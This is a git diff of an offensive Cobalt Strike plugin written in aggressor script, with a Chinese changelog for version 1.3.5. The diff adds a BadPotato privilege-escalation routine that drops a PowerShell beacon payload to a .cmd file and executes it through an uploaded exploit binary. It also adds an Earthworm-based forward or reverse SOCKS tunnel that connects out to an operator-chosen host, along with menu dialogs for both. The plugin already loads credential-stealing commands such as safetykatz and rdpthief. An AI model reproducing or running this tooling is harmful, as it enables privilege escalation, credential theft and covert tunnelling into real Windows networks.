diff --git a/Main.cna b/Main.cna index 4783cdd..4b17816 100644 --- a/Main.cna +++ b/Main.cna @@ -2,7 +2,7 @@ action("\cB Loading initial scripts....."); include(script_resource("Common.sl")); include(script_resource("modules/commands.cna")); -action("\c9 Loaded commands: safetykatz,seatbelt,hivejack,logonscreen"); +action("\c9 Loaded commands: safetykatz,seatbelt,hivejack,logonscreen,badcmd"); include(script_resource("modules/auxiliary.cna")); include(script_resource("third/rdpthief/RdpThief.cna")); action("\c9 Loaded command: rdpthief"); diff --git a/README.md b/README.md index 06b4a01..7c7da37 100644 --- a/README.md +++ b/README.md @@ -4,6 +4,14 @@ **由于异步处理问题,某些功能可能会存在BUG** **暂时未找到解决方法,如果大佬们有解决方案,欢迎联系我~** + +## 更新日志 2020-10-19(V1.3.5) +- 添加badcmd命令(基于badpotato) +- potatos提权添加badpotato +- post模块添加socks功能(基于ew) + >详见post---->Socks tunnel + ![输入图片描述](README_md_files/20201019154454.png?v=1&type=image) +- **删除信息收集模块审计功能** ## 更新日志 2020-07-31(V1.3.4) - 添加fakelogonscreen命令 - 添加SpaceRunner diff --git a/README_md_files/20201019154454.png b/README_md_files/20201019154454.png new file mode 100644 index 0000000..c2dfe7d Binary files /dev/null and b/README_md_files/20201019154454.png differ diff --git a/README_md_files/image.png b/README_md_files/image.png index 0fc0bc6..ea86bba 100644 Binary files a/README_md_files/image.png and b/README_md_files/image.png differ diff --git a/modules/lpe.cna b/modules/lpe.cna index 6284658..7c23df4 100644 --- a/modules/lpe.cna +++ b/modules/lpe.cna @@ -3,17 +3,11 @@ sub RunJuicyPotato{ btask($bid, "Task Beacon to run " . listener_describe($3['listener']) . " via JuicyPotato"); - local('$payload $handle $call $port $id $fname $total'); - @array = @("a", "b", "c", "d", "e", "f", "g", "1", "2", "3", "4", "5", "6"); - $total = 8; + local('$payload $handle $call $port $id $fname'); $call = $3['Call']; $port = $3['Port']; $id = $3['CLSID']; - while($total >= 0){ - $fname = $fname.rand(@array); - $total = $total - 1; - } - $fname = $fname.".cmd"; + $fname = Getname().".cmd"; if ($call eq "CreateProcessWithTokenW"){ $call = "t"; } @@ -41,6 +35,18 @@ sub RunJuicyPotato{ exec("cmd.exe /C del /F ".$fname); } +sub BadPotato{ + btask($bid, "Task Beacon to run " . listener_describe($3['listener']) . " via BadPotato"); + local('$payload $handle $fname'); + $fname = Getname().".cmd"; + $payload = powershell($3['listener'], false); + $handle = openf("> $+ $fname"); + writeb($handle, $payload); + closef($handle); + bupload!($bid, $fname); + bexecute_assembly($bid, script_resource("post/BadPotato.exe"), $fname); +} + sub CVE_2018_8120{ btask($bid, "Task Beacon to run " . listener_describe($3['listener']) . " via CVE-2018-8120"); local('$Rch $payload'); @@ -178,6 +184,14 @@ sub cve_2019_0803{ dbutton_action($Dialog, "Exploit"); dialog_show($Dialog); } + item "Bad-Potato"{ + $bid = $1['@']; + $Dialog = dialog("Bad Potato",%(bid => $bid),&BadPotato); + dialog_description($Dialog, "The vulnerability could allow elevation of privilege."); + drow_listener($Dialog, "listener", "Listener: "); + dbutton_action($Dialog, "Exploit"); + dialog_show($Dialog); + } } diff --git a/modules/post.cna b/modules/post.cna index 19b5f69..2643abe 100644 --- a/modules/post.cna +++ b/modules/post.cna @@ -85,6 +85,26 @@ sub Migrate{ bshell!($bid,$cmd); btask($bid, "migrating process location to ".$dir.$process.", please wait new session !", ""); } +sub Socks{ + local('$type $lport $refhost $refport $rch'); + $type = $3['type']; + $lport = $3['listenport']; + $refhost = $3['refhost']; + $refport = $3['refport']; + $rch = "x86"; + if (beacon_info($bid,"is64") == 1){ + $rch = "x64"; + } + bupload!($bid, script_resource("post/ew/ $+ $rch $+ .exe")); + if($type eq "Forward"){ + bshell!($bid, $rch.".exe -s ssocksd -l ".$lport); + btask($bid, "Started socks5 server at: ".beacon_info($bid, "external").":".$lport); + } + else{ + bshell!($bid, $rch.".exe -s rssocks -d ".$refhost." -e ".$refport); + btask($bid, "Started socks5 server at: ".$refhost.":".$refport); + } +} #append menus @@ -160,4 +180,16 @@ sub Migrate{ dbutton_action($dialog, "Exec"); dialog_show($dialog); } + + item "Socks tunnel"{ + $bid = $1['@']; + $dialog = dialog("Create socks server",%(bid => $bid, listenport => "1080", refhost => "1.1.1.1", refport => "8888"), &Socks); + dialog_description($dialog,"Create a forward or reverse socks5 server use Earthworm."); + drow_combobox($dialog, "type", "Type: ", @("Forward", "Reverse")); + drow_text($dialog, "listenport", "Listen port(-l): ", ""); + drow_text($dialog, "refhost", "Reflection host address(-d): ", ""); + drow_text($dialog, "refport", "Reflection port(-e): ", ""); + dbutton_action($dialog, "Exec"); + dialog_show($dialog); + } } diff --git a/post/ew/x32.exe b/post/ew/x32.exe new file mode 100644 index 0000000..35003c8 Binary files /dev/null and b/post/ew/x32.exe differ diff --git a/post/ew/x64.exe b/post/ew/x64.exe new file mode 100644 index 0000000..35003c8 Binary files /dev/null and b/post/ew/x64.exe differ diff --git a/setting.txt b/setting.txt index 9e5f78f..d8a98c8 100644 --- a/setting.txt +++ b/setting.txt @@ -1,2 +1,2 @@ -ver = 1.3.4 +ver = 1.3.5 dir = C:\Services\ \ No newline at end of file